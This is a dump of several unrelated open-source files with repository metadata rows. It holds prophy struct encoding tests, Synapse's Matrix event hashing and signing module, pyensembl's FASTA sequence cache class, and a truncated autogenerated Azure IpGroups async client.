assert x.y == 5
assert x.z == 6
def test_struct_exception_with_access_to_nonexistent_field():
with pytest.raises(AttributeError):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u32)]
X().im_not_there
def test_struct_encoding_with_scalars():
class S(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u8)]
x = S()
x.a = 1
x.b = 2
x.c = 3
assert b"\x01\x00\x00\x02\x03\x00" == x.encode(">")
assert b"\x01\x00\x02\x00\x03\x00" == x.encode("<")
assert 6 == x.decode(b"\x06\x00\x00\x07\x08\x00", ">")
assert 6 == x.a
assert 7 == x.b
assert 8 == x.c
def test_struct_encoding_with_inner_struct():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u16),
("b", prophy.u8)]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", A),
("b", prophy.u64)]
x = B()
x.a.a = 1
x.a.b = 2
x.b = 3
assert b"\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03" == x.encode(">")
assert 16 == x.decode(b"\x00\x0a\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c", ">")
assert 0xa == x.a.a
assert 0xb == x.a.b
assert 0xc == x.b
def test_struct_encoding_with_arrays():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.array(prophy.u8, size = 3)),
("b_len", prophy.u16),
("b", prophy.array(prophy.u32, bound = "b_len"))]
x = A()
x.a[:] = [1, 2, 3]
x.b[:] = [4, 5, 6]
assert (b"\x01\x02\x03\x00"
b"\x00\x03\x00\x00"
b"\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06") == x.encode(">")
assert 16 == x.decode((b"\x04\x05\x06\x00"
b"\x00\x02\x00\x00"
b"\x00\x00\x00\x01\x00\x00\x00\x02"), ">")
assert [4, 5, 6] == x.a[:]
assert [1, 2] == x.b[:]
def test_struct_with_multiple_dynamic_fields():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a_len", prophy.u16),
("b_len", prophy.u8),
("a", prophy.array(prophy.u32, bound = "a_len")),
("b", prophy.array(prophy.u8, bound = "b_len"))]
x = A()
x.a[:] = [1, 2]
x.b[:] = [3, 4]
assert b'\x00\x02\x02\x00\x00\x00\x00\x01\x00\x00\x00\x02\x03\x04\x00\x00' == x.encode('>')
assert b'\x02\x00\x02\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x04\x00\x00' == x.encode('<')
x.decode(b'\x01\x00\x03\x00\x05\x00\x00\x00\x02\x01\x00', '<')
assert [5] == x.a[:]
assert [2, 1, 0] == x.b[:]
def test_struct_with_greedy_bytes():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a_len", prophy.u16),
("a", prophy.array(prophy.u16, bound = "a_len")),
("b", prophy.bytes())]
x = A()
x.a[:] = [5, 6, 7]
x.b = b'ala ma kota'
assert b'\x00\x03\x00\x05\x00\x06\x00\x07ala ma kota\x00' == x.encode('>')
assert b'\x03\x00\x05\x00\x06\x00\x07\x00ala ma kota\x00' == x.encode('<')
x.decode(b'\x00\x01\x00\x08abacus\x00\x00', '>')
assert [8] == x.a[:]
assert b'abacus\x00\x00' == x.b
def test_struct_with_and_without_padding():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u64),
("d", prophy.u8)]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u64),
("d", prophy.u8)]
x = A()
x.a = 1
x.b = 2
x.c = 3
x.d = 4
assert b'\x01\x00'b'\x02\x00\x00\x00\x00\x00'b'\x03\x00\x00\x00\x00\x00\x00\x00'b'\x04\x00\x00\x00\x00\x00\x00\x00' == x.encode('<')
x.decode(b'\x04\x00'b'\x05\x00\x00\x00\x00\x00'b'\x06\x00\x00\x00\x00\x00\x00\x00'b'\x07\x00\x00\x00\x00\x00\x00\x00', '<')
assert x.a == 4
assert x.b == 5
assert x.c == 6
assert x.d == 7
x = B()
x.a = 1
x.b = 2
x.c = 3
x.d = 4
assert b'\x01'b'\x02\x00'b'\x03\x00\x00\x00\x00\x00\x00\x00'b'\x04' == x.encode('<')
x.decode(b'\x04'b'\x05\x00'b'\x06\x00\x00\x00\x00\x00\x00\x00'b'\x07', '<')
assert x.a == 4
assert x.b == 5
assert x.c == 6
assert x.d == 7
def test_struct_with_substruct_with_bytes():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("num_of_x", prophy.u32),
("x", prophy.array(prophy.u8, bound = "num_of_x"))]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("num_of_x", prophy.u32),
("x", prophy.array(A, bound = "num_of_x"))]
x = B()
x.x.add().x[:] = [1]
x.x.add().x[:] = [1, 2, 3]
x.x.add().x[:] = [1, 2, 3, 4, 5, 6, 7]
assert (b'\x03\x00\x00\x00'
b'\x01\x00\x00\x00\x01\x00\x00\x00'
b'\x03\x00\x00\x00\x01\x02\x03\x00'
b'\x07\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x00') == x.encode('<')
x.decode((b'\x02\x00\x00\x00'
b'\x01\x00\x00\x00\x06\x00\x00\x00'
b'\x07\x00\x00\x00\x07\x08\x09\x0a\x0b\x0c\x0d\x00'), '<')
assert x.x[0].x[:] == [6]
assert x.x[1].x[:] == [7, 8, 9, 10, 11, 12, 13]
class C(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", A)]
x = C()
x.x.x[:] = [1]
assert b'\x01\x00\x00\x00\x01\x00\x00\x00' == x.encode('<')
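# Illustrative sketch (not part of the original test suite): the plain
# define/encode/decode cycle that the tests above exercise, written as ordinary
# library usage. ``Point`` is a made-up struct name.
def _example_prophy_roundtrip():
    class Point(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = [("x", prophy.u32), ("y", prophy.u32)]
    p = Point()
    p.x = 1
    p.y = 2
    wire = p.encode(">")   # big-endian: b'\x00\x00\x00\x01\x00\x00\x00\x02'
    q = Point()
    q.decode(wire, ">")
    return q.x, q.y        # (1, 2)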
| mit | 5,285,814,586,476,552,000 | 29.348457 | 136 | 0.454698 | false |
matrix-org/synapse | synapse/crypto/event_signing.py | 1 | 6136 | #
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import hashlib
import logging
from typing import Any, Callable, Dict, Tuple
from canonicaljson import encode_canonical_json
from signedjson.sign import sign_json
from signedjson.types import SigningKey
from unpaddedbase64 import decode_base64, encode_base64
from synapse.api.errors import Codes, SynapseError
from synapse.api.room_versions import RoomVersion
from synapse.events import EventBase
from synapse.events.utils import prune_event, prune_event_dict
from synapse.types import JsonDict
logger = logging.getLogger(__name__)
Hasher = Callable[[bytes], "hashlib._Hash"]
def check_event_content_hash(
event: EventBase, hash_algorithm: Hasher = hashlib.sha256
) -> bool:
"""Check whether the hash for this PDU matches the contents"""
name, expected_hash = compute_content_hash(event.get_pdu_json(), hash_algorithm)
logger.debug(
"Verifying content hash on %s (expecting: %s)",
event.event_id,
encode_base64(expected_hash),
)
# some malformed events lack a 'hashes'. Protect against it being missing
# or a weird type by basically treating it the same as an unhashed event.
hashes = event.get("hashes")
# nb it might be a frozendict or a dict
if not isinstance(hashes, collections.abc.Mapping):
raise SynapseError(
400, "Malformed 'hashes': %s" % (type(hashes),), Codes.UNAUTHORIZED
)
if name not in hashes:
raise SynapseError(
400,
"Algorithm %s not in hashes %s" % (name, list(hashes)),
Codes.UNAUTHORIZED,
)
message_hash_base64 = hashes[name]
try:
message_hash_bytes = decode_base64(message_hash_base64)
except Exception:
raise SynapseError(
400, "Invalid base64: %s" % (message_hash_base64,), Codes.UNAUTHORIZED
)
return message_hash_bytes == expected_hash
def compute_content_hash(
event_dict: Dict[str, Any], hash_algorithm: Hasher
) -> Tuple[str, bytes]:
"""Compute the content hash of an event, which is the hash of the
unredacted event.
Args:
event_dict: The unredacted event as a dict
hash_algorithm: A hasher from `hashlib`, e.g. hashlib.sha256, to use
to hash the event
Returns:
A tuple of the name of hash and the hash as raw bytes.
"""
event_dict = dict(event_dict)
event_dict.pop("age_ts", None)
event_dict.pop("unsigned", None)
event_dict.pop("signatures", None)
event_dict.pop("hashes", None)
event_dict.pop("outlier", None)
event_dict.pop("destinations", None)
event_json_bytes = encode_canonical_json(event_dict)
hashed = hash_algorithm(event_json_bytes)
return hashed.name, hashed.digest()
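# Illustrative sketch (not part of the original module): how the content hash
# computed above is attached to an event and later verified. The event dict
# below is a hypothetical minimal example; real events carry many more fields.
def _example_content_hash_roundtrip() -> bool:
    event_dict = {"type": "m.room.message", "content": {"body": "hi"}}
    name, digest = compute_content_hash(event_dict, hashlib.sha256)
    event_dict.setdefault("hashes", {})[name] = encode_base64(digest)
    # A receiving server recomputes the hash (compute_content_hash strips the
    # "hashes" key before hashing) and compares it against the advertised value.
    _, recomputed = compute_content_hash(event_dict, hashlib.sha256)
    return recomputed == digest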
def compute_event_reference_hash(
event, hash_algorithm: Hasher = hashlib.sha256
) -> Tuple[str, bytes]:
"""Computes the event reference hash. This is the hash of the redacted
event.
Args:
event
hash_algorithm: A hasher from `hashlib`, e.g. hashlib.sha256, to use
to hash the event
Returns:
A tuple of the name of hash and the hash as raw bytes.
"""
tmp_event = prune_event(event)
event_dict = tmp_event.get_pdu_json()
event_dict.pop("signatures", None)
event_dict.pop("age_ts", None)
event_dict.pop("unsigned", None)
event_json_bytes = encode_canonical_json(event_dict)
hashed = hash_algorithm(event_json_bytes)
return hashed.name, hashed.digest()
def compute_event_signature(
room_version: RoomVersion,
event_dict: JsonDict,
signature_name: str,
signing_key: SigningKey,
) -> Dict[str, Dict[str, str]]:
"""Compute the signature of the event for the given name and key.
Args:
room_version: the version of the room that this event is in.
(the room version determines the redaction algorithm and hence the
json to be signed)
event_dict: The event as a dict
signature_name: The name of the entity signing the event
(typically the server's hostname).
signing_key: The key to sign with
Returns:
a dictionary in the same format of an event's signatures field.
"""
redact_json = prune_event_dict(room_version, event_dict)
redact_json.pop("age_ts", None)
redact_json.pop("unsigned", None)
if logger.isEnabledFor(logging.DEBUG):
logger.debug("Signing event: %s", encode_canonical_json(redact_json))
redact_json = sign_json(redact_json, signature_name, signing_key)
if logger.isEnabledFor(logging.DEBUG):
logger.debug("Signed event: %s", encode_canonical_json(redact_json))
return redact_json["signatures"]
def add_hashes_and_signatures(
room_version: RoomVersion,
event_dict: JsonDict,
signature_name: str,
signing_key: SigningKey,
) -> None:
"""Add content hash and sign the event
Args:
room_version: the version of the room this event is in
event_dict: The event to add hashes to and sign
signature_name: The name of the entity signing the event
(typically the server's hostname).
signing_key: The key to sign with
"""
name, digest = compute_content_hash(event_dict, hash_algorithm=hashlib.sha256)
event_dict.setdefault("hashes", {})[name] = encode_base64(digest)
event_dict["signatures"] = compute_event_signature(
room_version, event_dict, signature_name=signature_name, signing_key=signing_key
)
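# Illustrative sketch (not part of the original module): the usual call shape
# for signing an outgoing event. ``generate_signing_key`` comes from the
# signedjson package; the room version, key version and server name below are
# assumptions for the example.
def _example_sign_event(room_version: RoomVersion, event_dict: JsonDict) -> JsonDict:
    from signedjson.key import generate_signing_key
    signing_key = generate_signing_key("key1")  # normally loaded from the homeserver config
    add_hashes_and_signatures(
        room_version,
        event_dict,
        signature_name="example.server",
        signing_key=signing_key,
    )
    return event_dict  # now carries both "hashes" and "signatures"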
| apache-2.0 | -8,759,924,720,279,790,000 | 32.530055 | 88 | 0.679596 | false |
hammerlab/pyensembl | pyensembl/sequence_data.py | 1 | 5420 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from os import remove
from os.path import exists, abspath, split, join
import logging
from collections import Counter
from six.moves import cPickle as pickle
from six import string_types
from .common import (load_pickle, dump_pickle)
from .fasta import parse_fasta_dictionary
logger = logging.getLogger(__name__)
class SequenceData(object):
"""
    Container for reference nucleotide and amino acid sequences.
"""
def __init__(
self,
fasta_paths,
cache_directory_path=None):
if isinstance(fasta_paths, string_types):
fasta_paths = [fasta_paths]
self.fasta_paths = [abspath(path) for path in fasta_paths]
self.fasta_directory_paths = [split(path)[0] for path in self.fasta_paths]
self.fasta_filenames = [split(path)[1] for path in self.fasta_paths]
if cache_directory_path:
self.cache_directory_paths = [cache_directory_path] * len(self.fasta_paths)
else:
self.cache_directory_paths = self.fasta_directory_paths
for path in self.fasta_paths:
if not exists(path):
raise ValueError("Couldn't find FASTA file %s" % (path,))
self.fasta_dictionary_filenames = [
filename + ".pickle" for filename in self.fasta_filenames]
self.fasta_dictionary_pickle_paths = [
join(cache_path, filename) for cache_path, filename in
zip(self.cache_directory_paths, self.fasta_dictionary_filenames)]
self._init_lazy_fields()
def _init_lazy_fields(self):
self._fasta_dictionary = None
self._fasta_keys = None
def clear_cache(self):
self._init_lazy_fields()
for path in self.fasta_dictionary_pickle_paths:
if exists(path):
remove(path)
def __str__(self):
return "SequenceData(fasta_paths=%s)" % (self.fasta_paths,)
def __repr__(self):
return str(self)
def __contains__(self, sequence_id):
if self._fasta_keys is None:
self._fasta_keys = set(self.fasta_dictionary.keys())
return sequence_id in self._fasta_keys
def __eq__(self, other):
# test to see if self.fasta_paths and other.fasta_paths contain
# the same list of paths, regardless of order
return (
(other.__class__ is SequenceData) and
Counter(self.fasta_paths) == Counter(other.fasta_paths))
def __hash__(self):
return hash(self.fasta_paths)
def _add_to_fasta_dictionary(self, fasta_dictionary_tmp):
for identifier, sequence in fasta_dictionary_tmp.items():
if identifier in self._fasta_dictionary:
                logger.warning(
                    "Sequence identifier %s is duplicated in your FASTA files!",
                    identifier)
continue
self._fasta_dictionary[identifier] = sequence
def _load_or_create_fasta_dictionary_pickle(self):
self._fasta_dictionary = dict()
for fasta_path, pickle_path in zip(self.fasta_paths, self.fasta_dictionary_pickle_paths):
if exists(pickle_path):
# try loading the cached file
# but we'll fall back on recreating it if loading fails
try:
fasta_dictionary_tmp = load_pickle(
pickle_path)
self._add_to_fasta_dictionary(fasta_dictionary_tmp)
logger.info(
"Loaded sequence dictionary from %s", pickle_path)
continue
except (pickle.UnpicklingError, AttributeError):
# catch either an UnpicklingError or an AttributeError
# resulting from pickled objects refering to classes
# that no longer exists
                    logger.warning(
"Failed to load %s, attempting to read FASTA directly",
pickle_path)
logger.info("Parsing sequences from FASTA file at %s", fasta_path)
fasta_dictionary_tmp = parse_fasta_dictionary(fasta_path)
self._add_to_fasta_dictionary(fasta_dictionary_tmp)
logger.info("Saving sequence dictionary to %s", pickle_path)
dump_pickle(fasta_dictionary_tmp, pickle_path)
def index(self, overwrite=False):
if overwrite:
self.clear_cache()
self._load_or_create_fasta_dictionary_pickle()
@property
def fasta_dictionary(self):
if not self._fasta_dictionary:
self._load_or_create_fasta_dictionary_pickle()
return self._fasta_dictionary
def get(self, sequence_id):
"""Get sequence associated with given ID or return None if missing"""
return self.fasta_dictionary.get(sequence_id)
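# Illustrative sketch (not part of the original module): typical usage against a
# single FASTA file. The path and the sequence identifier are made up.
def _example_sequence_lookup(fasta_path="transcripts.fa", sequence_id="ENST00000335137"):
    sequences = SequenceData([fasta_path])
    sequences.index()             # parse the FASTA (or load the cached pickle)
    if sequence_id in sequences:  # SequenceData.__contains__
        return sequences.get(sequence_id)
    return None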
| apache-2.0 | -3,712,856,413,055,222,300 | 38.275362 | 97 | 0.621402 | false |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_12_01/aio/operations/_ip_groups_operations.py | 1 | 27195 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class IpGroupsOperations:
"""IpGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
ip_groups_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.IpGroup":
"""Gets the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param expand: Expands resourceIds (of Firewalls/Network Security Groups etc.) back referenced
by the IpGroups resource.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.IpGroup",
**kwargs
) -> "_models.IpGroup":
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'IpGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('IpGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.IpGroup",
**kwargs
) -> AsyncLROPoller["_models.IpGroup"]:
"""Creates or updates an ipGroups in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the create or update IpGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either IpGroup or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_12_01.models.IpGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def update_groups(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.TagsObject",
**kwargs
) -> "_models.IpGroup":
"""Updates tags of an IpGroups resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the update ipGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_groups.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
ip_groups_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
ip_groups_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
